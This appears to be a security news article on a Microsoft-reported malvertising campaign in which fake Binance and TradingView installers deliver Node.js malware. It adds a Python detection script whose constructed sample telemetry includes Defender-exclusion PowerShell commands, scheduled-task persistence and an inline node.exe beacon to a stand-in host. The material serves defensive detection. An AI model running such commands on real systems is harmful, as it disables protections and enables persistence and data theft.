Crypto Trap Uncovered: Fake Binance & TradingView Installers Spread Node.js Malware in Stealth Campaign

Microsoft has warned of a malvertising campaign that targets cryptocurrency users and has been observed since October 2024. The campaign uses the Node.js runtime to carry out its malicious activity, including system reconnaissance, information theft and data exfiltration. The lure is fake cryptocurrency trading software, impersonating Binance and TradingView, that tricks users into downloading and running malware packaged as a legitimate installer.
Rogue Installers Deployed via Malicious Websites
The attack begins when a victim is lured, via malicious advertising, to a fake website that imitates a popular cryptocurrency platform such as Binance or TradingView. The installer downloaded from the fake site bundles a malicious DLL named "CustomActions.dll". This DLL collects basic system information from the host and establishes persistence by creating a scheduled task so that the malware is launched again after the installer finishes. As a decoy, the DLL launches "msedge_proxy.exe" (the Microsoft Edge component that can display any website as a windowed web application) to open a window showing the genuine cryptocurrency trading site. The user sees what looks like the program they intended to install while the malicious code runs in the background.
Malware Avoids Detection by Microsoft Defender
After installation, the malware configures Microsoft Defender for Endpoint to skip scanning of the running PowerShell process and of its current working directory, so that the payloads it stages there are never inspected. (Adding Defender exclusions requires administrative rights, so this step only succeeds if the installer was run elevated, which a user installing "trading software" will typically have consented to.) The malware then downloads additional obfuscated PowerShell scripts from a remote server that take an extensive inventory of the victim's system, including BIOS information, hardware details, the operating system and installed applications. The collected data is serialized as JSON and sent to a command-and-control (C2) server in an HTTPS POST request. This stage gives the attackers the information they need to select and prioritize victims for later exploitation.
Node.js Runtime and JavaScript Execution
The next step in the chain downloads a Node.js runtime binary together with a compiled JavaScript (JSC) file. The Node.js executable runs the JSC file, which establishes network connections and likely steals sensitive information from the victim's browser.
In some variants the attackers use a social-engineering technique known as ClickFix, in which the victim is tricked into pasting and running a PowerShell command themselves. That command downloads the Node.js binary and passes the JavaScript to it inline rather than from a file on disk. This inline JavaScript is responsible for discovering valuable assets on the victim's network, disguising C2 traffic as legitimate Cloudflare activity, and ensuring persistence by modifying Windows Registry keys.
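The behaviours described in the two sections above (Defender exclusions set from PowerShell, scheduled-task persistence, msedge_proxy.exe used as a decoy window, node.exe running a .jsc file or inline JavaScript) are all visible in process-creation telemetry. The script below is an added example, not code from Microsoft's report or from the Coinfomania article, showing how a responder might scan such telemetry for those indicators and treat the combination, rather than any single hit, as the signal. The detection rules are my own regular expressions over command lines, the event format is a minimal constructed one, and every sample log line is fabricated for illustration; none of them are real indicators from the campaign.

```python
"""Scan process-creation command lines for the Node.js malvertising chain.

Added example. The rules are assumptions about how the behaviours in the
article appear in command-line telemetry; the sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    why: str


# Each rule maps to one stage of the chain described in the article.
RULES = [
    Rule("defender-exclusion",
         re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I),
         "PowerShell adding a Microsoft Defender exclusion (T1562.001)"),
    Rule("schtask-persistence",
         re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I),
         "scheduled task created for persistence (T1053.005)"),
    Rule("msedge-proxy-app",
         re.compile(r"\bmsedge_proxy\.exe\b.*--app=", re.I),
         "msedge_proxy.exe showing a site as a windowed web app (decoy)"),
    Rule("node-jsc-file",
         re.compile(r"\bnode(\.exe)?\b[^\n]*\.jsc\b", re.I),
         "node.exe executing a compiled JavaScript (.jsc) file (T1059.007)"),
    Rule("node-inline-js",
         re.compile(r"\bnode(\.exe)?\s+(-e|--eval)\b", re.I),
         "node.exe executing inline JavaScript, as in the ClickFix variant"),
]

# Constructed sample telemetry (not real campaign data): one host, in order.
SAMPLE_EVENTS = [
    {"image": "msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\Binance-Setup.msi"'},
    {"image": "powershell.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionProcess powershell.exe"'},
    {"image": "powershell.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath C:\Users\alice\AppData\Local\Temp"'},
    {"image": "schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc onlogon /tn "Updater" /tr "C:\Users\alice\AppData\Local\Temp\launcher.exe"'},
    {"image": "msedge_proxy.exe",
     "cmdline": r"msedge_proxy.exe --app=https://www.tradingview.com/ --no-first-run"},
    {"image": "node.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\node.exe C:\Users\alice\AppData\Local\Temp\payload.jsc"},
    {"image": "node.exe",
     "cmdline": "node.exe -e \"const h=require('https');h.get('https://t.example/beacon')\""},
    # Benign noise: a developer running a server and an admin reading settings.
    {"image": "node.exe",
     "cmdline": r"C:\Program Files\nodejs\node.exe C:\dev\app\server.js"},
    {"image": "powershell.exe",
     "cmdline": "powershell.exe Get-MpPreference"},
]


def scan(events):
    """Return one hit per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule.pattern.search(ev["cmdline"]):
                hits.append({"rule": rule.name, "why": rule.why,
                             "image": ev["image"], "cmdline": ev["cmdline"]})
    return hits


def assess(events, threshold=3):
    """Correlate hits on one host: several distinct stages together are the
    signal, since msedge_proxy.exe or a lone schtasks call is normal on its own."""
    fired = sorted({h["rule"] for h in scan(events)})
    return {"fired": fired, "suspicious": len(fired) >= threshold}


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h['rule']}] {h['why']}\n    {h['cmdline']}")
    print(assess(SAMPLE_EVENTS))
```

The threshold in assess is deliberately conservative: msedge_proxy.exe is used legitimately for installed web apps, and developers run node.exe all day, so each rule alone is a hunting lead rather than an alert. The defender-exclusion rule is the exception worth alerting on by itself in most environments, since few legitimate installers add exclusions for a PowerShell process and its working directory.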
Node.js Malvertising: A New Threat Vector
Node.js, an open-source JavaScript runtime, has long been trusted by developers for server-side applications and build tooling, and its binary is present on many developer and enterprise machines. Attackers are now exploiting that familiarity: by running their payload under a legitimate, widely installed runtime, and in some variants never writing the JavaScript to disk at all, they make the malicious activity look like ordinary software behaviour, evade signature-based controls, and make detection harder for tools that do not inspect what the runtime is actually executing.
Conclusion
The ongoing Node.js malvertising campaign is a growing threat to cryptocurrency users and to internet security more broadly. By abusing a trusted technology such as Node.js, attackers mask their activity from traditional security tools. The campaign underscores the need for caution when downloading software from unfamiliar sources, in particular from sites reached through advertisements, and for behaviour-based monitoring that can catch the chain of actions these installers perform.
The post Crypto Trap Uncovered: Fake Binance & TradingView Installers Spread Node.js Malware in Stealth Campaign appeared first on Coinfomania.